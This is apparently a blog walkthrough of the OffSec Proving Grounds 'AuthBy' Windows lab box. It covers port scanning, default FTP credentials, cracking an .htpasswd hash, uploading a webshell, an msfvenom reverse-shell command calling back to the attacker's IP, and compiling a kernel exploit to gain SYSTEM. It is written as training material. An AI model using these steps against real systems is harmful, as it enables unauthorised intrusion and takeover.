AuthBy Walkthrough - Proving Grounds OffSec
AuthBy was actually a decently easy box even though it was labeled as "intermediate." I chose to do a Windows box this time to keep up my memory on Windows pen testing. So after booting up and grabbing the IP address of our attack, I went ahead and started a port scan with nmap. I had to disable ICMP packets during this scan with the -Pn flag.
nmap -p- -Pn 192.168.152.46 -o nmap.txt
PORT STATE SERVICE
21/tcp open ftp
242/tcp open direct
3145/tcp open csi-lfap
3389/tcp open ms-wbt-serverI then ran another nmap scan on just the ports that were open to find out what services were running on the open ports and version numbers.
nmap -sV -sC -Pn -p 21,242,3145,3389 192.168.152.46
PORT STATE SERVICE VERSION
21/tcp open ftp zFTPServer 6.0 build 2011-10-17
ftp-syst:
STAT:
System status
Connected to KALI
Logged in as IEUser@
TYPE: ASCII, FORM: Nonprint; STRUcture: File; transfer MODE: STREAM
No Data Connection
End of Status
ftp-anon: Anonymous FTP login allowed (FTP code 230)
total 9680
---------- 1 root root 5610496 Oct 18 2011 zFTPServer.exe
---------- 1 root root 25 Feb 10 2011 UninstallService.bat
---------- 1 root root 4284928 Oct 18 2011 Uninstall.exe
---------- 1 root root 17 Aug 13 2011 StopService.bat
---------- 1 root root 18 Aug 13 2011 StartService.bat
---------- 1 root root 8736 Nov 09 2011 Settings.ini
dr-xr-xr-x 1 root root 512 Sep 29 20:14 log
---------- 1 root root 2275 Aug 08 2011 LICENSE.htm
---------- 1 root root 23 Feb 10 2011 InstallService.bat
dr-xr-xr-x 1 root root 512 Nov 08 2011 extensions
dr-xr-xr-x 1 root root 512 Nov 08 2011 certificates
dr-xr-xr-x 1 root root 512 Jan 23 2023 accounts
242/tcp open http Apache httpd 2.2.21 ((Win32) PHP/5.3.8)
http-auth:
HTTP/1.1 401 Authorization Required
Basic realm=Qui e nuce nuculeum esse volt, frangit nucem!
http-title: 401 Authorization Required
http-server-header: Apache/2.2.21 (Win32) PHP/5.3.8
3145/tcp open zftp-admin zFTPServer admin
3389/tcp open ssl/ms-wbt-server?
ssl-cert: Subject: commonName=LIVDA
Not valid before: 2023-01-22T09:37:27
Not valid after: 2023-07-24T09:37:27
ssl-date: 2023-09-29T13:17:31+00:00; -1s from scanner time.
rdp-ntlm-info:
Target_Name: LIVDA
NetBIOS_Domain_Name: LIVDA
NetBIOS_Computer_Name: LIVDA
DNS_Domain_Name: LIVDA
DNS_Computer_Name: LIVDA
Product_Version: 6.0.6001
System_Time: 2023-09-29T13:17:27+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoftI first looked at port 242 as it was running a webserver. I was immediately prompted to sign into the site. I tried normal credentials such as admin:admin but was unsuccessful.
I then backed up to the FTP server on port 21 that was able to be logged into anonymously according to our script scan from nmap.
After looking through the directories, I looked at the "accounts" directory and found what appeared to be usernames: Offsec, anonymous, and admin.
I tried to log in with the usernames and basic default passwords, and the first one I tried let me in: admin
I saw that I was able to get the .htpasswd file for the web server we were just looking at that was prompting for a login. I grabbed the file and cat it on my local machine to reveal the hash for a user "offsec."
All I needed to do now was run the file through John or Hashcat and crack that password so that we can log in as offsec on the web server.
Almost instantly, John cracked the password using rockyou.txt. I grabbed that password and logged in as offsec in the web server.
Since I knew where the directory was for this web page, and I had admin access to it, I knew that I could upload files to the directory. So I grabbed a webshell and uploaded it using the put command.
Now that the webshell was uploaded to the directory, all I had to do was access it via the web browser, and I will have RCE.
Now that I have RCE, I needed to get an interactive shell, so I created an msfvenom reverse executable shell and uploaded it to the same folder using the webshell, though I could have uploaded it via FTP as well.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.156 LPORT=4444 -f exe > shell.exe
Once I uploaded the shell, I set up a netcat listener on port 4444 and then executed the shell using the webshell command feature.
Finally, I have a fully interactive shell. The next steps I tried were uploading winPEAS to the machine but was unable to execute it due to architecture type mismatch, which I could have grabbed the other version of winPEAS, but just decided to enumerate a bit myself. I ran "whoami /privs" and saw "SeImpersonatePrivilege" was enabled. I thought I might be able to use PrintSpoofer or our Potato family to try and escalate privileges, but wanted to enumerate a bit further. I ran "systeminfo" and saw the OS Version. I had seen this version before on another CTF, so I immediately Googled for exploits.
I opened this page and copied the code into a file called 40564.c. I needed to compile this C file into an executable .exe file using mingw32.
i686-w64-mingw32-gcc 40564.c -o exploit.exe -lws2_32A small breakdown of this command: "i686-w64-mingw32-gcc" is the compiler I’m using to compile the code. It’s a cross-compiler designed for compiling code on a non-Windows system (like Linux, which I’m using to do this) into Windows executables. It generates 32-bit Windows executables (i686 architecture). Then we have the .c file I just made, the -o exploit.exe is the output we want it to be compiled to. -lws2_32 is a linker option that specifies that the Windows Socket 2 library should be linked with the program. This library provides functions for network programming on Windows, including socket operations. It is required if your C program uses networking functionality. I generally always use it when running kernel exploits anyway.
I then used certutil to transfer the new executable over to the target machine and ran it to gain priv esc to nt authority\system.
All in all, a fairly simple machine, but a fun one. I think I might keep doing Windows machines for a while to better up my skills with those again. I was doing nothing but Windows boxes while studying for the OSCP, but now find myself surrounded by Linux machines. Hope you enjoyed it, please leave a like, share, or comment on here if you enjoyed it or have any questions or comments to make.
-Sam
